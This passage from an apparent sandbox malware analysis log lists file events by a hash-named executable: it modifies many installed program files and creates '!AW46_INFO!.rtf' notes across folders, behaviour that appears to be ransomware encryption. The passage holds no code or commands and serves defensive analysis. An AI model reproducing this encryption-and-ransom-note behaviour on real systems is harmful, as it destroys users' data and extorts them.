Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-GB.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ja.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\gu.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\manifest.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api 